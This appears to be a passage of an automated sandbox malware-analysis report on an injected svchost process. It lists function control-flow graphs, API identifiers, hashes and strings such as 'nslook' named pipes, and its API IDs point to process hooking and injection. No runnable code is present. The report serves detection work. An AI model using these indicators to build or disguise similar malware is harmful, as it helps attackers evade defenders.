                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 90659d94651a21918a60a458a439fcc906a3afe906c8bb55b984c90a793c4440
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: 90F1AFBA74668886FB669F15E444BED73A0FB84F88FC4482ADE4947788DF38C444C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D02630 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 195stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 443 1caf3d02630-1caf3d026c0 call 1caf3d20ce8 446 1caf3d0298d-1caf3d029aa call 1caf3d083e0 443->446 447 1caf3d026c6-1caf3d026ca 443->447 447->446 449 1caf3d026d0-1caf3d026de 447->449 449->446 451 1caf3d026e4-1caf3d0274a call 1caf3d09890 * 3 GetFileType 449->451 458 1caf3d0274c-1caf3d02753 451->458 459 1caf3d02755-1caf3d02771 GetFinalPathNameByHandleW 451->459 460 1caf3d027ae-1caf3d027b3 lstrcpyW 458->460 461 1caf3d02773-1caf3d0278f call 1caf3d0a610 459->461 462 1caf3d027b9-1caf3d027bd 459->462 460->462 461->462 469 1caf3d02791-1caf3d027a4 lstrlenW 461->469 464 1caf3d027c5-1caf3d027d0 462->464 466 1caf3d027ed 464->466 467 1caf3d027d2-1caf3d027eb 464->467 468 1caf3d027ef-1caf3d02805 call 1caf3d03b00 466->468 467->468 474 1caf3d02824-1caf3d0285b call 1caf3d03b00 lstrcmpiW 468->474 475 1caf3d02807-1caf3d0281e call 1caf3d0a610 468->475 469->462 470 1caf3d027a6 469->470 470->460 481 1caf3d0285d-1caf3d0287c lstrcpyW lstrcatW 474->481 482 1caf3d0287e-1caf3d02887 PathCombineW 474->482 475->474 480 1caf3d0291a-1caf3d0291c 475->480 484 1caf3d0291e-1caf3d02937 call 1caf3d09480 480->484 485 1caf3d02939-1caf3d0293c 480->485 483 1caf3d0288a-1caf3d02894 481->483 482->483 486 1caf3d02896-1caf3d0289d 483->486 487 1caf3d028e8-1caf3d028fa 483->487 496 1caf3d028fd-1caf3d028ff 484->496 489 1caf3d0293e-1caf3d02943 485->489 490 1caf3d02945-1caf3d02949 485->490 486->487 491 1caf3d0289f-1caf3d028a3 486->491 487->496 493 1caf3d0296d-1caf3d02985 489->493 494 1caf3d0294b-1caf3d0295d 490->494 495 1caf3d02969 490->495 491->487 498 1caf3d028a5 491->498 493->446 494->495 495->493 496->495 497 1caf3d02901 496->497 497->464 499 1caf3d028b0-1caf3d028c7 498->499 500 1caf3d028d1 lstrcmpW 499->500 501 1caf3d028c9-1caf3d028cf lstrcmpiW 499->501 502 1caf3d028d7-1caf3d028e0 500->502 501->502 503 1caf3d028e2-1caf3d028e6 502->503 504 1caf3d02906-1caf3d02912 502->504 503->487 503->499 504->480
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 479ca83c3c4f18c3770593c6920d49440b15901b1ee9f34259a298d13cf3f49d
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: 729175BA2477C886F7629F11E444BDE77A0FB84F88F844419DB8943A99DF38C545CB22
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D024F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 76filethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 2b2f948b5871da9d2a393709b6c432f82d9445a3f466e18cf4c53bb3dba90b5b
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: D631813A24664486FB219B16F454A9E77B0FB88F98F8405299E4D03B58DF3CC559CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3CD7AEC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 517 1caf3cd7aec-1caf3cd7af2 518 1caf3cd7af4-1caf3cd7af7 517->518 519 1caf3cd7b2d-1caf3cd7b37 517->519 521 1caf3cd7af9-1caf3cd7afc 518->521 522 1caf3cd7b21-1caf3cd7b60 call 1caf3cd82c8 518->522 520 1caf3cd7c54-1caf3cd7c69 519->520 526 1caf3cd7c78-1caf3cd7c92 call 1caf3cd815c 520->526 527 1caf3cd7c6b 520->527 524 1caf3cd7b14 __scrt_dllmain_crt_thread_attach 521->524 525 1caf3cd7afe-1caf3cd7b01 521->525 537 1caf3cd7b66-1caf3cd7b7b call 1caf3cd815c 522->537 538 1caf3cd7c2e 522->538 533 1caf3cd7b19-1caf3cd7b20 524->533 529 1caf3cd7b03-1caf3cd7b0c 525->529 530 1caf3cd7b0d-1caf3cd7b12 call 1caf3cd820c 525->530 540 1caf3cd7c94-1caf3cd7cc9 call 1caf3cd8284 call 1caf3cd8124 call 1caf3cd8620 call 1caf3cd8438 call 1caf3cd845c call 1caf3cd82b4 526->540 541 1caf3cd7ccb-1caf3cd7cfc call 1caf3cd8498 526->541 531 1caf3cd7c6d-1caf3cd7c77 527->531 530->533 550 1caf3cd7c46-1caf3cd7c53 call 1caf3cd8498 537->550 551 1caf3cd7b81-1caf3cd7b92 call 1caf3cd81cc 537->551 542 1caf3cd7c30-1caf3cd7c45 538->542 540->531 552 1caf3cd7cfe-1caf3cd7d04 541->552 553 1caf3cd7d0d-1caf3cd7d13 541->553 550->520 570 1caf3cd7be3-1caf3cd7bed call 1caf3cd8438 551->570 571 1caf3cd7b94-1caf3cd7bb8 call 1caf3cd85e4 call 1caf3cd8114 call 1caf3cd8140 call 1caf3cd9d00 551->571 552->553 559 1caf3cd7d06-1caf3cd7d08 552->559 554 1caf3cd7d15-1caf3cd7d1f 553->554 555 1caf3cd7d5a-1caf3cd7d70 call 1caf3cd3320 553->555 561 1caf3cd7d21-1caf3cd7d29 554->561 562 1caf3cd7d2b-1caf3cd7d39 call 1caf3ce3748 554->562 578 1caf3cd7d72-1caf3cd7d74 555->578 579 1caf3cd7daa-1caf3cd7dac 555->579 560 1caf3cd7dfd-1caf3cd7e0a 559->560 567 1caf3cd7d3f-1caf3cd7d54 call 1caf3cd7aec 561->567 562->567 580 1caf3cd7df3-1caf3cd7dfb 562->580 567->555 567->580 570->538 591 1caf3cd7bef-1caf3cd7bfb call 1caf3cd8488 570->591 571->570 620 1caf3cd7bba-1caf3cd7bc1 __scrt_dllmain_after_initialize_c 571->620 578->580 587 1caf3cd7d76-1caf3cd7d98 call 1caf3cd3320 call 1caf3cd7c54 578->587 582 1caf3cd7db3-1caf3cd7dc8 call 1caf3cd7aec 579->582 583 1caf3cd7dae-1caf3cd7db1 579->583 580->560 582->580 601 1caf3cd7dca-1caf3cd7dd4 582->601 583->580 583->582 587->580 612 1caf3cd7d9a-1caf3cd7da8 call 1caf3ce3748 587->612 609 1caf3cd7c21-1caf3cd7c2c 591->609 610 1caf3cd7bfd-1caf3cd7c07 call 1caf3cd83a0 591->610 607 1caf3cd7dd6-1caf3cd7ddd 601->607 608 1caf3cd7ddf-1caf3cd7def call 1caf3ce3748 601->608 607->580 608->580 609->542 610->609 619 1caf3cd7c09-1caf3cd7c17 610->619 612->580 619->609 620->570 622 1caf3cd7bc3-1caf3cd7be0 call 1caf3cd9c9c 620->622 622->570
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: ae32040b7b3a98bf7304c5855ef13517f9ba615d1bc882961316630ad0570e95
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: 7F81B2316C668D86F753AF669471BEDA2D0AF85F8CFC4401DF92443796DA38C46F8602
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D086EC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 625 1caf3d086ec-1caf3d086f2 626 1caf3d0872d-1caf3d08737 625->626 627 1caf3d086f4-1caf3d086f7 625->627 630 1caf3d08854-1caf3d08869 626->630 628 1caf3d08721-1caf3d08760 call 1caf3d08ec8 627->628 629 1caf3d086f9-1caf3d086fc 627->629 648 1caf3d0882e 628->648 649 1caf3d08766-1caf3d0877b call 1caf3d08d5c 628->649 631 1caf3d086fe-1caf3d08701 629->631 632 1caf3d08714 __scrt_dllmain_crt_thread_attach 629->632 633 1caf3d0886b 630->633 634 1caf3d08878-1caf3d08892 call 1caf3d08d5c 630->634 636 1caf3d0870d-1caf3d08712 call 1caf3d08e0c 631->636 637 1caf3d08703-1caf3d0870c 631->637 640 1caf3d08719-1caf3d08720 632->640 638 1caf3d0886d-1caf3d08877 633->638 646 1caf3d088cb-1caf3d088fc call 1caf3d09098 634->646 647 1caf3d08894-1caf3d088c9 call 1caf3d08e84 call 1caf3d08d24 call 1caf3d09220 call 1caf3d09038 call 1caf3d0905c call 1caf3d08eb4 634->647 636->640 659 1caf3d0890d-1caf3d08913 646->659 660 1caf3d088fe-1caf3d08904 646->660 647->638 652 1caf3d08830-1caf3d08845 648->652 657 1caf3d08781-1caf3d08792 call 1caf3d08dcc 649->657 658 1caf3d08846-1caf3d08853 call 1caf3d09098 649->658 675 1caf3d087e3-1caf3d087ed call 1caf3d09038 657->675 676 1caf3d08794-1caf3d087b8 call 1caf3d091e4 call 1caf3d08d14 call 1caf3d08d40 call 1caf3d0a900 657->676 658->630 665 1caf3d0895a-1caf3d08970 call 1caf3d03f20 659->665 666 1caf3d08915-1caf3d0891f 659->666 660->659 664 1caf3d08906-1caf3d08908 660->664 671 1caf3d089fd-1caf3d08a0a 664->671 684 1caf3d089aa-1caf3d089ac 665->684 685 1caf3d08972-1caf3d08974 665->685 672 1caf3d0892b-1caf3d08939 call 1caf3d14348 666->672 673 1caf3d08921-1caf3d08929 666->673 678 1caf3d0893f-1caf3d08954 call 1caf3d086ec 672->678 690 1caf3d089f3-1caf3d089fb 672->690 673->678 675->648 698 1caf3d087ef-1caf3d087fb call 1caf3d09088 675->698 676->675 728 1caf3d087ba-1caf3d087c1 __scrt_dllmain_after_initialize_c 676->728 678->665 678->690 688 1caf3d089ae-1caf3d089b1 684->688 689 1caf3d089b3-1caf3d089c8 call 1caf3d086ec 684->689 685->690 695 1caf3d08976-1caf3d08998 call 1caf3d03f20 call 1caf3d08854 685->695 688->689 688->690 689->690 708 1caf3d089ca-1caf3d089d4 689->708 690->671 695->690 722 1caf3d0899a-1caf3d089a8 call 1caf3d14348 695->722 715 1caf3d087fd-1caf3d08807 call 1caf3d08fa0 698->715 716 1caf3d08821-1caf3d0882c 698->716 713 1caf3d089df-1caf3d089ef call 1caf3d14348 708->713 714 1caf3d089d6-1caf3d089dd 708->714 713->690 714->690 715->716 727 1caf3d08809-1caf3d08817 715->727 716->652 722->690 727->716 728->675 730 1caf3d087c3-1caf3d087e0 call 1caf3d0a89c 728->730 730->675
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 26e4a7482ee748f6d49e957ffcbf55cc9b87a1f0ca93e730d4e269044a28936e
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: 5181E5FDA8224D8AF756AB25A441FDD66A0BF85F8CFC44D1D9A444339EDA38C4418733
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D03C30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 221stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 733 1caf3d03c30-1caf3d03c54 734 1caf3d03c5a-1caf3d03c5f 733->734 735 1caf3d03db7-1caf3d03dba 733->735 736 1caf3d03efa-1caf3d03f16 734->736 737 1caf3d03c65-1caf3d03c69 734->737 735->736 738 1caf3d03dc0-1caf3d03dc5 735->738 739 1caf3d03c70-1caf3d03c88 737->739 738->736 740 1caf3d03dcb-1caf3d03dce 738->740 741 1caf3d03c8a-1caf3d03c9e call 1caf3d0a610 739->741 742 1caf3d03ca4-1caf3d03cab 739->742 743 1caf3d03dd0-1caf3d03ddf 740->743 741->742 758 1caf3d03d72-1caf3d03d9e call 1caf3d09480 741->758 747 1caf3d03cad-1caf3d03cc1 call 1caf3d0a610 742->747 748 1caf3d03cc7-1caf3d03cd4 742->748 745 1caf3d03dfb-1caf3d03e02 743->745 746 1caf3d03de1-1caf3d03df5 call 1caf3d0a610 743->746 752 1caf3d03e1e-1caf3d03e2b 745->752 753 1caf3d03e04-1caf3d03e18 call 1caf3d0a610 745->753 746->745 769 1caf3d03ec2-1caf3d03ee6 call 1caf3d09480 746->769 747->748 747->758 754 1caf3d03d20-1caf3d03d2e 748->754 755 1caf3d03cd6-1caf3d03cdd 748->755 763 1caf3d03e2d-1caf3d03e34 752->763 764 1caf3d03e70-1caf3d03e7e 752->764 753->752 753->769 756 1caf3d03d30-1caf3d03d37 754->756 757 1caf3d03da1-1caf3d03dac 754->757 755->754 762 1caf3d03cdf-1caf3d03ce3 755->762 756->757 766 1caf3d03d39-1caf3d03d3d 756->766 757->739 765 1caf3d03db2 757->765 758->757 762->754 771 1caf3d03ce5 762->771 763->764 773 1caf3d03e36-1caf3d03e3a 763->773 767 1caf3d03e80-1caf3d03e87 764->767 768 1caf3d03ee9-1caf3d03ef4 764->768 765->736 766->757 775 1caf3d03d3f 766->775 767->768 776 1caf3d03e89-1caf3d03e8d 767->776 768->736 768->743 769->768 777 1caf3d03cf0-1caf3d03cff 771->777 773->764 779 1caf3d03e3c 773->779 782 1caf3d03d40-1caf3d03d4f 775->782 776->768 783 1caf3d03e8f 776->783 784 1caf3d03d01-1caf3d03d07 lstrcmpiW 777->784 785 1caf3d03d09 lstrcmpW 777->785 780 1caf3d03e40-1caf3d03e4f 779->780 787 1caf3d03e51-1caf3d03e57 lstrcmpiW 780->787 788 1caf3d03e59 lstrcmpW 780->788 789 1caf3d03d51-1caf3d03d57 lstrcmpiW 782->789 790 1caf3d03d59 lstrcmpW 782->790 791 1caf3d03e90-1caf3d03e9f 783->791 786 1caf3d03d0f-1caf3d03d18 784->786 785->786 786->758 792 1caf3d03d1a-1caf3d03d1e 786->792 793 1caf3d03e5f-1caf3d03e68 787->793 788->793 794 1caf3d03d5f-1caf3d03d68 789->794 790->794 795 1caf3d03ea1-1caf3d03ea7 lstrcmpiW 791->795 796 1caf3d03ea9 lstrcmpW 791->796 792->754 792->777 793->769 797 1caf3d03e6a-1caf3d03e6e 793->797 794->758 798 1caf3d03d6a-1caf3d03d6e 794->798 799 1caf3d03eaf-1caf3d03eb8 795->799 796->799 797->764 797->780 798->782 800 1caf3d03d70 798->800 799->769 801 1caf3d03eba-1caf3d03ebe 799->801 800->757 801->791 802 1caf3d03ec0 801->802 802->768
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: fc363703b85945f396ceb6e40efe4c4ef5aa06f6e187a463130505bc425caf08
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: 3B81EFBE343A4886FB569F26D544BAD2360FF00FC8F854A2DDA1647A98DB34C411C322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D011C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135stringregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: c1577d2e7ca3da6836641286d13c986415e323225c55ee343c3f861f4e851ab7
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: 80518EBA605B8487F755DB21F48079E73A4FB88F84F804829DB8943B58DF38C165CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D044F0 Relevance: 10.6, APIs: 7, Instructions: 125threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 836 1caf3d044f0-1caf3d0450a 837 1caf3d0473a-1caf3d0474b call 1caf3d083e0 836->837 838 1caf3d04510-1caf3d0452a GetModuleHandleW 836->838 840 1caf3d0452c-1caf3d04556 call 1caf3d14118 VirtualProtectEx 838->840 841 1caf3d04596-1caf3d045a5 838->841 840->841 848 1caf3d04558-1caf3d04590 call 1caf3d14118 VirtualProtectEx 840->848 843 1caf3d045ba-1caf3d045c1 841->843 844 1caf3d045a7-1caf3d045af TerminateThread 841->844 843->837 847 1caf3d045c7-1caf3d045f0 call 1caf3d069c0 GetCurrentThread call 1caf3d06ee0 843->847 844->843 855 1caf3d045f2-1caf3d045fe call 1caf3d06620 847->855 856 1caf3d04603-1caf3d04612 847->856 848->841 855->856 857 1caf3d04614-1caf3d04620 call 1caf3d06620 856->857 858 1caf3d04625-1caf3d04634 856->858 857->858 861 1caf3d04636-1caf3d04642 call 1caf3d06620 858->861 862 1caf3d04647-1caf3d04656 858->862 861->862 864 1caf3d04658-1caf3d04664 call 1caf3d06620 862->864 865 1caf3d04669-1caf3d04678 862->865 864->865 867 1caf3d0467a-1caf3d04686 call 1caf3d06620 865->867 868 1caf3d0468b-1caf3d0469a 865->868 867->868 870 1caf3d0469c-1caf3d046a8 call 1caf3d06620 868->870 871 1caf3d046ad-1caf3d046bc 868->871 870->871 873 1caf3d046be-1caf3d046ca call 1caf3d06620 871->873 874 1caf3d046cf-1caf3d046de 871->874 873->874 876 1caf3d046e0-1caf3d046ec call 1caf3d06620 874->876 877 1caf3d046f1-1caf3d04700 874->877 876->877 879 1caf3d04702-1caf3d0470e call 1caf3d06620 877->879 880 1caf3d04713-1caf3d04722 877->880 879->880 882 1caf3d04724-1caf3d04730 call 1caf3d06620 880->882 883 1caf3d04735 call 1caf3d06a30 880->883 882->883 883->837
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: 70e6f561c1eb3f939752b9bed59ac73874087983ce0d1d40c9e64857cd72c40b
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 4A61F6B82A7B4981FB92DB15E450BDD23A0FF84F48FC4581DA94E067A9EF38C114C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D0A140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 886 1caf3d0a140-1caf3d0a17d 887 1caf3d0a26d 886->887 888 1caf3d0a183-1caf3d0a186 886->888 889 1caf3d0a26f-1caf3d0a28b 887->889 888->889 890 1caf3d0a18c 888->890 891 1caf3d0a18f 890->891 892 1caf3d0a265 891->892 893 1caf3d0a195-1caf3d0a1a3 891->893 892->887 894 1caf3d0a1b0-1caf3d0a1cf LoadLibraryExW 893->894 895 1caf3d0a1a5-1caf3d0a1a8 893->895 898 1caf3d0a1d1-1caf3d0a1da call 1caf3d14070 894->898 899 1caf3d0a227-1caf3d0a23c 894->899 896 1caf3d0a1ae 895->896 897 1caf3d0a247-1caf3d0a256 GetProcAddress 895->897 900 1caf3d0a21b-1caf3d0a222 896->900 897->892 903 1caf3d0a258-1caf3d0a263 897->903 905 1caf3d0a1dc-1caf3d0a1f1 call 1caf3d0b838 898->905 906 1caf3d0a209-1caf3d0a213 898->906 899->897 902 1caf3d0a23e-1caf3d0a241 FreeLibrary 899->902 900->891 902->897 903->889 905->906 909 1caf3d0a1f3-1caf3d0a207 LoadLibraryExW 905->909 906->900 909->899 909->906
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 65e2976d0a42af2130eb147e7edb084dc780f9753c5b6a578f152fe1740407a9
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: 5C31C37A24774895FF1B9B12A800FDD22A4BF04F68F89493D9D2907759EE38C1548322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D02E38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: 3e9a5a48930e75629c221ceb7b1ea5e4c166303367022871518e3ccb6883d382
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: A031A0B93836498AFB169B26D440BEC6B72BF48F8CFD44819CE0A47698DF34C515C322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D027E9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: 833797296e46c5b7d956f8fd8a4e0a6db3e0c9cdfbb1b9d13d89579051f5369f
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 0131A37D24764886FB669F11D494BED6760FF44F88FC44819CE4A03698DF38C519C722
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D1295C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: e67e887bb96bb0dca2baac1f8a2af4cb668f9101999b2a03d53516ca95fd5aad
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: 2811BB36251B448BF352AB42F844B9D62B0FB88FE8F804728EB1D837A4CB38C9148715
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D019F0 Relevance: 10.3, APIs: 8, Instructions: 286stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: 35b90a3237b9a9135fda92b2496fd36be12056c0d932e51acbb0f9358983c5d5
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: 9CC172BE74260887FB62CF1AD080BAD73A9FB44F88FD58819DB1943758DB35C8958721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D06A40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction ID: 19fdd1cb08e27cc95f15cc9a1ca83366530aafe963dfa33d28d3e745cc58701e
